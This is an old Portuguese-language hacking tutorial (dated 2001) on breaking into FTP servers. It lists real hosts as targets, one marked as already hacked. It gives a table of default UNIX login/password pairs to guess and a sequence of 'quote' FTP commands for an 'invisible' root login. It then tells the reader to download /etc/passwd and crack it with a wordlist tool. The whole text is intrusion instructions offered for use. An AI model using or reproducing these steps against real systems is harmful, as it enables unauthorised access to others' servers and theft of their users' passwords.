Ataque por FTP
Bom, hoje em dia é muito difícil achar um servidor mal montado, que permita essas dicas, mas se você conheça aqui vai elas:
Para Hackear um Servidor FTP, Primeiro você deve saber o indereço do Host ou seu IP, para isto use o IPSCAN ou outro programa qualquer de IP.
Lista de Alguns FTP's:
ftp.mandic.com.br, ftp.bestway.com.br, ftp.internetclub.com.br(HACKEADO), ftp.netscape.com, ftp.angelfire.com,
Existem
varios Programas de FTP'S, no Windows vem um programa de FTP. Va
ao Prompt e digite FTP, ao aparece o prompt ftp>, digite OPEN,
ira abrir um outro Prompt (to), digite o nome do host ou seu IP,
tipo (to) ftp.mandic.com.br.
Ao conectar ele pedirá a senha e o Password, tente usar os passwords UNIX, aí vai os passwords do UNIX, se não der você deve tentar entrar INVISIVEL:
| Login: | Password: |
| root | root |
| root | system |
| sys | sys |
| sys | system |
| daemon | daemon |
| uucp | uucp |
| tty | tty |
| test | test |
| unix | unix |
| unix | test |
| bin | bin |
| adm | adm |
| adm | admin |
| admin | adm |
| admin | admin |
| sysman | sysman |
| sysman | sys |
| sysman | system |
| sysadmin | sysadmin |
| sysadmin | sys |
| sysadmin | system |
| sysadmin | admin |
| sysadmin | adm |
| who | who |
| learn | learn |
| uuhost | uuhost |
| guest | guest |
| host | host |
| nuucp | nuucp |
| rje | rje |
| games | games |
| games | player |
| sysop | sysop |
| root | sysop |
| demo | demo |
Para entrar Invisivel:
No login precione ENTER, no password precione ENTER novamente.
Ira aparecer o prompt ftp> ai é só digitar: quote user ftp, precione ENTER e digite: quote cwd ~root
Precione ENTER novamente e digite: quote pass ftp
Pronto, você esta Hackeando invisivel. Mas tem um porem, se quando você entrar aparecer a mensagem: user restriction aplly, você não esta Hackeando, pois esta aplicada a proteção, para isto tente com outro USER tipo:
quote cwd ~sys e os outros da lista UNIX (acima)
ATENÇÃO!!!!
Não tente Hackear usando o user normal de FTP'S, que é login : anonymous e password: seu E-Mail, pois vai ser aplicado a proteção. Ao entrar você vai estar no diretório do login, tipo \home\root\ Daí você entra no diretório /etc (cd etc) e pegue o arquivo PASSWD (get passwd), ele contém as senhas doas usuarios, estão todas criptografadas, mas existe prgramas com o Jack que conseguem descriptografar através do metodo de comparação, o Jack pega uma Worlist (arquivo palavras mais usadas como senha), criptografa ela com as instruções do passwd e compara, os resultados são gravados em um arquivo!
Copyright®2001.Todos os direitos Reservados a <Mundo-HackerBr>